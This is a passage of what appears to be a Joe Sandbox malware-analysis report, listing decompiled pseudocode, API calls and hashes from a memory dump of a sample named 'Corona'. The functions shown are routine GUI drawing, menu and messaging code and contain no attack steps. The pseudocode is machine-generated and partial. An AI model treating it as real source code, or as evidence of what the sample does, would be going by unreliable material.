                                  				_t120 = __ecx;
                                  				_t143 = _t144;
                                  				_v16 = 0;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t139 = __eax;
                                  				_t117 = _a4;
                                  				_push(_t144);
                                  				_push(0x43e8a0);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t144 + 0xffffffe4;
                                  				_t53 = E00440654(__eax);
                                  				_t135 = _t53;
                                  				if(_t53 != 0 && E00441C90(_t135) != 0) {
                                  					if((_t117 & 0x00000000) != 0) {
                                  						__eflags = (_t117 & 0x00000002) - 2;
                                  						if((_t117 & 0x00000002) == 2) {
                                  							_t117 = _t117 & 0xfffffffd;
                                  							__eflags = _t117;
                                  						}
                                  					} else {
                                  						_t117 = _t117 & 0xffffffff | 0x00000002;
                                  					}
                                  					_t117 = _t117 | 0x00020000;
                                  				}
                                  				E00403EE4( &_v16, _v12);
                                  				if((_t117 & 0x00000004) == 0) {
                                  					L12:
                                  					E00404258(_v16, 0x43e8c4);
                                  					if(_t153 != 0) {
                                  						E0041CD14( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                  						__eflags =  *((char*)(_t139 + 0x3a));
                                  						if( *((char*)(_t139 + 0x3a)) != 0) {
                                  							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                  							__eflags = E0041C6EC( *((intOrPtr*)(_v8 + 0xc))) |  *0x43e8c8;
                                  							E0041C6F8( *((intOrPtr*)(_v8 + 0xc)), E0041C6EC( *((intOrPtr*)(_v8 + 0xc))) |  *0x43e8c8, _t136, _t139, _t143);
                                  						}
                                  						__eflags =  *((char*)(_t139 + 0x39));
                                  						if( *((char*)(_t139 + 0x39)) != 0) {
                                  							L24:
                                  							_t63 = E0040410C(_v16);
                                  							_t65 = E0040430C(_v16);
                                  							DrawTextA(E0041D2CC(_v8), _t65, _t63, _a12, _t117);
                                  							L25:
                                  							_pop(_t127);
                                  							 *[fs:eax] = _t127;
                                  							_push(0x43e8a7);
                                  							return E00403E4C( &_v16);
                                  						} else {
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								OffsetRect(_a12, 1, 1);
                                  								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  								_t89 = E0040410C(_v16);
                                  								_t91 = E0040430C(_v16);
                                  								DrawTextA(E0041D2CC(_v8), _t91, _t89, _a12, _t117);
                                  								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                  							}
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								L23:
                                  								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                  							} else {
                                  								_t76 = E0041BF6C(0xff00000d);
                                  								_t78 = E0041BF6C(0xff000010);
                                  								__eflags = _t76 - _t78;
                                  								if(_t76 != _t78) {
                                  									goto L23;
                                  								}
                                  								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  							}
                                  							goto L24;
                                  						}
                                  					}
                                  					if((_t117 & 0x00000004) == 0) {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_v32.top = _v32.top + 4;
                                  						DrawEdge(E0041D2CC(_v8),  &_v32, 6, 2);
                                  					}
                                  					goto L25;
                                  				} else {
                                  					if(_v16 == 0) {
                                  						L11:
                                  						E00404114( &_v16, 0x43e8b8);
                                  						goto L12;
                                  					}
                                  					if( *_v16 != 0x26) {
                                  						goto L12;
                                  					}
                                  					_t153 =  *((char*)(_v16 + 1));
                                  					if(_t153 != 0) {
                                  						goto L12;
                                  					}
                                  					goto L11;
                                  				}
                                  			}

                                  APIs
                                  • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0043E78B
                                  • OffsetRect.USER32(?,00000001,00000001), ref: 0043E7DC
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043E811
                                  • OffsetRect.USER32(?,000000FF,000000FF), ref: 0043E81E
                                  • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0043E885
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Draw$OffsetRectText$Edge
                                  • String ID:
                                  • API String ID: 3610532707-0
                                  • Opcode ID: 8a453785712a99c3861b660413ace8f3c5f24bd2fb40b66b0a09eafdf1adcdb0
                                  • Instruction ID: be76095b00cec7cc5de92278f33a3eeb2928d3a82112b1450e0144909ccb8dfd
                                  • Opcode Fuzzy Hash: 8a453785712a99c3861b660413ace8f3c5f24bd2fb40b66b0a09eafdf1adcdb0
                                  • Instruction Fuzzy Hash: BC515170E01204AFDB10FBAAC881B9EB7E5AF49314F14956AF924A73D2C7389D408B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E0042C168(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				struct HWND__* _v24;
                                  				intOrPtr _v28;
                                  				char _v32;
                                  				struct tagRECT _v48;
                                  				struct tagRECT _v64;
                                  				struct HWND__* _t53;
                                  				intOrPtr _t55;
                                  				intOrPtr _t60;
                                  				intOrPtr _t65;
                                  				intOrPtr _t78;
                                  				intOrPtr _t84;
                                  				intOrPtr _t86;
                                  				intOrPtr _t93;
                                  				intOrPtr _t98;
                                  				intOrPtr _t101;
                                  				void* _t102;
                                  				intOrPtr* _t104;
                                  				intOrPtr _t106;
                                  				intOrPtr _t110;
                                  				intOrPtr _t112;
                                  				struct HWND__* _t113;
                                  				intOrPtr _t114;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  
                                  				_t102 = __ecx;
                                  				_t101 = __eax;
                                  				_v5 = 1;
                                  				_t113 = E0042C5B8(_a4 + 0xfffffff7);
                                  				_v24 = _t113;
                                  				_t53 = GetWindow(_t113, 4);
                                  				_t104 =  *0x450fc8; // 0x452bb0
                                  				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
                                  					L6:
                                  					if(_v24 == 0) {
                                  						L25:
                                  						return _v5;
                                  					}
                                  					_t114 = _t101;
                                  					while(1) {
                                  						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                  						if(_t55 == 0) {
                                  							break;
                                  						}
                                  						_t114 = _t55;
                                  					}
                                  					_t112 = E00434EF4(_t114);
                                  					_v28 = _t112;
                                  					if(_t112 == _v24) {
                                  						goto L25;
                                  					}
                                  					_t13 = _a4 - 0x10; // 0xe87d83e8
                                  					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                  					if(_t60 == 0) {
                                  						_t19 = _a4 - 0x10; // 0xe87d83e8
                                  						_t106 =  *0x42abf0; // 0x42ac3c
                                  						__eflags = E00403288( *_t19, _t106);
                                  						if(__eflags == 0) {
                                  							__eflags = 0;
                                  							_v32 = 0;
                                  						} else {
                                  							_t21 = _a4 - 0x10; // 0xe87d83e8
                                  							_v32 = E00434EF4( *_t21);
                                  						}
                                  						L19:
                                  						_v12 = 0;
                                  						_t65 = _a4;
                                  						_v20 =  *((intOrPtr*)(_t65 - 9));
                                  						_v16 =  *((intOrPtr*)(_t65 - 5));
                                  						_push( &_v32);
                                  						_push(E0042C0FC);
                                  						_push(GetCurrentThreadId());
                                  						L0040631C();
                                  						_t126 = _v12;
                                  						if(_v12 == 0) {
                                  							goto L25;
                                  						}
                                  						GetWindowRect(_v24,  &_v48);
                                  						_push(_a4 + 0xfffffff7);
                                  						_push(_a4 - 1);
                                  						E004032F8(_t101, _t126);
                                  						_t78 =  *0x452b30; // 0x0
                                  						_t110 =  *0x429988; // 0x4299d4
                                  						if(E00403288(_t78, _t110) == 0) {
                                  							L23:
                                  							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                  								_v5 = 0;
                                  							}
                                  							goto L25;
                                  						}
                                  						_t84 =  *0x452b30; // 0x0
                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                  							goto L23;
                                  						}
                                  						_t86 =  *0x452b30; // 0x0
                                  						if(E00434EF4( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                  							goto L25;
                                  						}
                                  						goto L23;
                                  					}
                                  					_t116 = _t60;
                                  					while(1) {
                                  						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                  						if(_t93 == 0) {
                                  							break;
                                  						}
                                  						_t116 = _t93;
                                  					}
                                  					_v32 = E00434EF4(_t116);
                                  					goto L19;
                                  				}
                                  				_t117 = E0042B6D4(_v24, _t102);
                                  				if(_t117 == 0) {
                                  					goto L25;
                                  				} else {
                                  					while(1) {
                                  						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                  						if(_t98 == 0) {
                                  							break;
                                  						}
                                  						_t117 = _t98;
                                  					}
                                  					_v24 = E00434EF4(_t117);
                                  					goto L6;
                                  				}
                                  			}

                                  APIs
                                    • Part of subcall function 0042C5B8: WindowFromPoint.USER32(0042C392,00452B54,00000000,0042C182,?,-0000000C,?), ref: 0042C5BE
                                    • Part of subcall function 0042C5B8: GetParent.USER32(00000000), ref: 0042C5D5
                                  • GetWindow.USER32(00000000,00000004), ref: 0042C18A
                                  • GetCurrentThreadId.KERNEL32 ref: 0042C25E
                                  • 72E7AC10.USER32(00000000,0042C0FC,?,00000000,00000004,?,-0000000C,?), ref: 0042C264
                                  • GetWindowRect.USER32 ref: 0042C27B
                                  • IntersectRect.USER32 ref: 0042C2E9
                                    • Part of subcall function 0042B6D4: GetWindowThreadProcessId.USER32(00000000), ref: 0042B6E1
                                    • Part of subcall function 0042B6D4: GetCurrentProcessId.KERNEL32(?,?,00000000,0044D953,?,?,0044F588,00000001,0044DABF,?,?,?,0044F588), ref: 0042B6EA
                                    • Part of subcall function 0042B6D4: GlobalFindAtomA.KERNEL32 ref: 0042B6FF
                                    • Part of subcall function 0042B6D4: GetPropA.USER32 ref: 0042B716
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                  • String ID:
                                  • API String ID: 2049660638-0
                                  • Opcode ID: 9b8f00c982fabec7dbf17187b9b3eb81cf084e59fe4850d40ba6705e678210ba
                                  • Instruction ID: 0184b3c44583206bddfdcfa19fc4174bc128048d644a055b47a46bbb108ca221
                                  • Opcode Fuzzy Hash: 9b8f00c982fabec7dbf17187b9b3eb81cf084e59fe4850d40ba6705e678210ba
                                  • Instruction Fuzzy Hash: 65515D75B002199FCB10DFA9D881AAFB7E4BF08354F5441A6E814EB352D738ED41CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00432BA8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				int _v16;
                                  				int _v20;
                                  				struct tagPAINTSTRUCT _v84;
                                  				intOrPtr _t55;
                                  				void* _t64;
                                  				struct HDC__* _t75;
                                  				intOrPtr _t84;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  				intOrPtr _t102;
                                  
                                  				_t100 = _t101;
                                  				_t102 = _t101 + 0xffffffb0;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t75 =  *(_v12 + 4);
                                  				if(_t75 == 0) {
                                  					_t75 = BeginPaint(E00434EF4(_v8),  &_v84);
                                  				}
                                  				_push(_t100);
                                  				_push(0x432cc8);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t102;
                                  				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                  					_v20 = SaveDC(_t75);
                                  					_v16 = 2;
                                  					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                  					if(_t95 >= 0) {
                                  						_t96 = _t95 + 1;
                                  						_t98 = 0;
                                  						do {
                                  							_t64 = E004136F8( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                  							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                  								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                  									goto L11;
                                  								} else {
                                  									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                  									if(_v16 != 1) {
                                  										goto L11;
                                  									}
                                  								}
                                  							} else {
                                  								goto L11;
                                  							}
                                  							goto L12;
                                  							L11:
                                  							_t98 = _t98 + 1;
                                  							_t96 = _t96 - 1;
                                  						} while (_t96 != 0);
                                  					}
                                  					L12:
                                  					if(_v16 != 1) {
                                  						 *((intOrPtr*)( *_v8 + 0xb8))();
                                  					}
                                  					RestoreDC(_t75, _v20);
                                  				} else {
                                  					 *((intOrPtr*)( *_v8 + 0xb8))();
                                  				}
                                  				E00432D00(_v8, 0, _t75);
                                  				_pop(_t84);
                                  				 *[fs:eax] = _t84;
                                  				_push(0x432ccf);
                                  				_t55 = _v12;
                                  				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                  					return EndPaint(E00434EF4(_v8),  &_v84);
                                  				}
                                  				return _t55;
                                  			}



















                                  APIs
                                  • BeginPaint.USER32(00000000,?), ref: 00432BCE
                                  • SaveDC.GDI32(?), ref: 00432C02
                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00432C64
                                  • RestoreDC.GDI32(?,?), ref: 00432C8E
                                  • EndPaint.USER32(00000000,?,00432CCF), ref: 00432CC2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                  • String ID:
                                  • API String ID: 3808407030-0
                                  • Opcode ID: 9bbe7d10dfa805fa30e94fef3aee4c52ba2618f03f19f030b7287df04e414cc8
                                  • Instruction ID: 17d0ccce02ad6be057bbb3d0e7cde5112c0de556dac2e4ead2b1e64afaa1341b
                                  • Opcode Fuzzy Hash: 9bbe7d10dfa805fa30e94fef3aee4c52ba2618f03f19f030b7287df04e414cc8
                                  • Instruction Fuzzy Hash: 8A416070A00204AFCB04DF99C985E9EB7F9FF4D304F15A0AAE5049B362D7799D45CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0043E4FC(int __eax, void* __edx) {
                                  				signed int _t39;
                                  				signed int _t40;
                                  				intOrPtr _t44;
                                  				int _t46;
                                  				int _t47;
                                  				intOrPtr* _t48;
                                  
                                  				_t18 = __eax;
                                  				_t48 = __eax;
                                  				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                                  					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                                  						 *((char*)(__eax + 0x74)) = 1;
                                  						return __eax;
                                  					}
                                  					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                                  					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                                  						return E0043E4FC(_t19, __edx);
                                  					}
                                  					_t18 = GetMenuItemCount(E0043E62C(__eax));
                                  					_t47 = _t18;
                                  					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
                                  					while(_t47 > 0) {
                                  						_t46 = _t47 - 1;
                                  						_t18 = GetMenuState(E0043E62C(_t48), _t46, 0x400);
                                  						if((_t18 & 0x00000004) == 0) {
                                  							_t18 = RemoveMenu(E0043E62C(_t48), _t46, 0x400);
                                  							_t40 = 1;
                                  						}
                                  						_t47 = _t47 - 1;
                                  					}
                                  					if(_t40 != 0) {
                                  						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
                                  							L14:
                                  							E0043E3BC(_t48);
                                  							L15:
                                  							return  *((intOrPtr*)( *_t48 + 0x3c))();
                                  						}
                                  						_t44 =  *0x43d010; // 0x43d05c
                                  						if(E00403288( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0043E62C(_t48)) != 0) {
                                  							goto L14;
                                  						} else {
                                  							DestroyMenu( *(_t48 + 0x34));
                                  							 *(_t48 + 0x34) = 0;
                                  							goto L15;
                                  						}
                                  					}
                                  				}
                                  				return _t18;
                                  			}










                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8735c84f0b7003790e44ca07493abb2b21793c90df8ee70cf33f37ac102ac067
                                  • Instruction ID: dc9c0f912c9b1bd9f9057e6902e168c72f6bb9116b3de8094e9aa1fc4fec60df
                                  • Opcode Fuzzy Hash: 8735c84f0b7003790e44ca07493abb2b21793c90df8ee70cf33f37ac102ac067
                                  • Instruction Fuzzy Hash: 5F116061602255AADE60BFBB880575B26899F5875CF04242FBC01973C3EA3DDC05869C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 22%
                                  			E0043670C(void* __eax) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr* _t14;
                                  				intOrPtr* _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t26;
                                  				intOrPtr _t37;
                                  				void* _t39;
                                  				intOrPtr _t47;
                                  				void* _t49;
                                  				void* _t51;
                                  				intOrPtr _t52;
                                  
                                  				_t49 = _t51;
                                  				_t52 = _t51 + 0xfffffff4;
                                  				_t39 = __eax;
                                  				if( *((short*)(__eax + 0x68)) == 0xffff) {
                                  					return __eax;
                                  				} else {
                                  					_t14 =  *0x450e7c; // 0x4528f8
                                  					_t17 =  *0x450e7c; // 0x4528f8
                                  					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
                                  					_push(_t19);
                                  					L00423688();
                                  					_v8 = _t19;
                                  					_push(_t49);
                                  					_push(0x4367cc);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t52;
                                  					_t21 =  *0x451104; // 0x452bb4
                                  					E004236C0(_v8, E0044BCE8( *_t21,  *((short*)(__eax + 0x68))));
                                  					_t26 =  *0x451104; // 0x452bb4
                                  					E004236C0(_v8, E0044BCE8( *_t26,  *((short*)(_t39 + 0x68))));
                                  					_push(0);
                                  					_push(0);
                                  					_push(0);
                                  					_push(_v8);
                                  					L0042370C();
                                  					_push( &_v16);
                                  					_push(0);
                                  					L0042371C();
                                  					_push(_v12);
                                  					_push(_v16);
                                  					_push(1);
                                  					_push(_v8);
                                  					L0042370C();
                                  					_pop(_t47);
                                  					 *[fs:eax] = _t47;
                                  					_push(0x4367d3);
                                  					_t37 = _v8;
                                  					_push(_t37);
                                  					L00423690();
                                  					return _t37;
                                  				}
                                  			}


















                                  APIs
                                  • 73451AB0.COMCTL32(00000000), ref: 0043673E
                                    • Part of subcall function 004236C0: 73452140.COMCTL32(0042C88E,000000FF,00000000,0043676E,00000000,004367CC,?,00000000), ref: 004236C4
                                  • 73451680.COMCTL32(0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 00436792
                                  • 73451710.COMCTL32(00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 0043679D
                                  • 73451680.COMCTL32(0042C88E,00000001,?,00436835,00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 004367B0
                                  • 73451F60.COMCTL32(0042C88E,004367D3,00436835,00000000,?,0042C88E,00000000,00000000,00000000,00000000,004367CC,?,00000000), ref: 004367C6
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 7345173451680$7345171073452140
                                  • String ID:
                                  • API String ID: 821207058-0
                                  • Opcode ID: d41354580313031bd698ff731645bd39065cd6c9aae414377b4728281c33a05b
                                  • Instruction ID: dcbc41d2b7e66bae2a91779db5bdf0941149a07cf719c9d70b775f229e795004
                                  • Opcode Fuzzy Hash: d41354580313031bd698ff731645bd39065cd6c9aae414377b4728281c33a05b
                                  • Instruction Fuzzy Hash: 01212F74700214BFEB10EFA9DC82F5973F8EB49705F504496B900DB291DA79EE00C758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044D8FC(void* __eax, void* __ecx, struct HWND__** __edx) {
                                  				intOrPtr _t11;
                                  				intOrPtr _t20;
                                  				void* _t30;
                                  				void* _t31;
                                  				void* _t33;
                                  				struct HWND__** _t34;
                                  				struct HWND__* _t35;
                                  				struct HWND__* _t36;
                                  
                                  				_t31 = __ecx;
                                  				_t34 = __edx;
                                  				_t33 = __eax;
                                  				_t30 = 0;
                                  				_t11 =  *((intOrPtr*)(__edx + 4));
                                  				if(_t11 < 0x100 || _t11 > 0x108) {
                                  					L16:
                                  					return _t30;
                                  				} else {
                                  					_t35 = GetCapture();
                                  					if(_t35 != 0) {
                                  						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x452664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  					_t36 =  *_t34;
                                  					_t2 = _t33 + 0x44; // 0x0
                                  					_t20 =  *_t2;
                                  					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                  						L7:
                                  						if(E0042B6D4(_t36, _t31) == 0 && _t36 != 0) {
                                  							_t36 = GetParent(_t36);
                                  							goto L7;
                                  						}
                                  						if(_t36 == 0) {
                                  							_t36 =  *_t34;
                                  						}
                                  						goto L11;
                                  					} else {
                                  						_t36 = E00434EF4(_t20);
                                  						L11:
                                  						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                  							_t30 = 1;
                                  						}
                                  						goto L16;
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • GetCapture.USER32 ref: 0044D91F
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044F588,?), ref: 0044D973
                                  • GetWindowLongA.USER32 ref: 0044D983
                                  • SendMessageA.USER32(00000000,-0000BBEE,0044F588,?), ref: 0044D9A2
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: MessageSend$CaptureLongWindow
                                  • String ID:
                                  • API String ID: 1158686931-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E0042191C(struct HPALETTE__* __eax) {
                                  				struct HPALETTE__* _t21;
                                  				char _t28;
                                  				signed int _t30;
                                  				struct HPALETTE__* _t36;
                                  				struct HPALETTE__* _t37;
                                  				struct HDC__* _t38;
                                  				intOrPtr _t39;
                                  
                                  				_t21 = __eax;
                                  				_t36 = __eax;
                                  				_t39 =  *((intOrPtr*)(__eax + 0x28));
                                  				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                                  					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                                  					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                                  						E0042037C(_t22);
                                  					}
                                  					_t21 = E0041DDB4( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                                  					_t37 = _t21;
                                  					 *(_t39 + 0x10) = _t37;
                                  					if(_t37 == 0) {
                                  						_push(0);
                                  						L0040638C();
                                  						_t21 = E0041D6C4(_t21);
                                  						_t38 = _t21;
                                  						if( *((char*)(_t39 + 0x71)) != 0) {
                                  							L9:
                                  							_t28 = 1;
                                  						} else {
                                  							_push(0xc);
                                  							_push(_t38);
                                  							L004060D4();
                                  							_push(0xe);
                                  							_push(_t38);
                                  							L004060D4();
                                  							_t30 = _t21 * _t21;
                                  							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                                  							if(_t30 < _t21) {
                                  								goto L9;
                                  							} else {
                                  								_t28 = 0;
                                  							}
                                  						}
                                  						 *((char*)(_t39 + 0x71)) = _t28;
                                  						if(_t28 != 0) {
                                  							_t21 = CreateHalftonePalette(_t38);
                                  							 *(_t39 + 0x10) = _t21;
                                  						}
                                  						_push(_t38);
                                  						_push(0);
                                  						L004065C4();
                                  						if( *(_t39 + 0x10) == 0) {
                                  							 *((char*)(_t36 + 0x30)) = 1;
                                  							return _t21;
                                  						}
                                  					}
                                  				}
                                  				return _t21;
                                  			}











                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                  • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                  • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: B380CreateHalftonePalette
                                  • String ID:
                                  • API String ID: 178651289-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E0044AF84(void* __eax) {
                                  				void* _t16;
                                  				void* _t37;
                                  				void* _t38;
                                  				signed int _t41;
                                  
